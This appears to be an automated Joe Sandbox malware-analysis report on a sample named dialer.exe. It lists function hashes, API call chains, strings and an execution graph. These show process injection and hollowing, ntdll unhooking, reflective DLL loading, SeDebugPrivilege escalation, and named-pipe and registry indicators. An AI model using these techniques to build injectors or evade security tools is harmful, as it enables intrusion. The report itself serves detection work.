                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: 3b0d6dddc5cda5e1bd1b352df7cd7797e84a2228af3517d70ae7b287450ec1cf
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: CE41A336716A8086DB60CFA5F8583AA77A0FB99B94F448131EE4D87794DF3CCA52C740
                                                                      Function 00000283E0F494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 5579d35dcaf91ad1cd0ca791ae9fd9cc4e12dcf6ed5a46996f24cb29e10fdbd9
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: B011FB36219B8082EB61CB15E45435977E5FB88F94F588225EE8D47B69DF3CCA62CB00
                                                                      Function 00000283E0F17356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: b8c83cca01c4564f0c871dc0f54677a3b79baeb8a7858315c295f9fe351a1ccf
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 4BE08661641B44D0DF01CF21E85429833A0EF58F64B58D1329D5C46351FE38D2FAC300
                                                                      Function 00000283E0F173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 56eea4608479d4b951214e51dd6120cc5c41e6183e581f993db96d2a5a1d3e31
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: E1E0E665651B44D4DF01CF61D4541987365FB58F64B98D132DD5C46355FE38D2F6C300
                                                                      Function 00000283E0F41BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 307d70f52149b1f595fd0f8130877afef073a5c5cfe590f8f49550f0d4e01082
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: 3D118C29606F8581EA44DB66A86826973A1FF89FC0F188038DE4D43766DF38C963C300
                                                                      Function 00000283E0F41268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: bc8b4917df651573b7cb4e9393ba346fec3d33987c72220a69f65ad094d59ab8
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 30E06D39602A0586EB44CFA2D82C36A36E1FF89F06F04C024CD1907751DF7DC9AAC750

                                                                      Execution Graph

                                                                      Execution Coverage:48.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:226
                                                                      Total number of Limit Nodes:22
                                                                      execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                                      Callgraph

                                                                      Executed Functions

                                                                      Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                      • API String ID: 4177739653-1130149537
                                                                      • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                      • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                      Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                      • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                      • API String ID: 2561231171-3753927220
                                                                      • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                      • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                      Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                      • String ID:
                                                                      • API String ID: 4084875642-0
                                                                      • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                      • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                      Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                      • String ID: .text$C:\Windows\System32\
                                                                      • API String ID: 2721474350-832442975
                                                                      • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                      • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                      Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                      • String ID: M$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2203880229-3489460547
                                                                      • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                      • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                      • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                      • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                      Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 2071455217-3440882674
                                                                      • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                      • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                      • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                      • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                      Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 3197395349-0
                                                                      • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                      • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                      • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                      • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                      Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                                      APIs
                                                                      Memory Dump Source
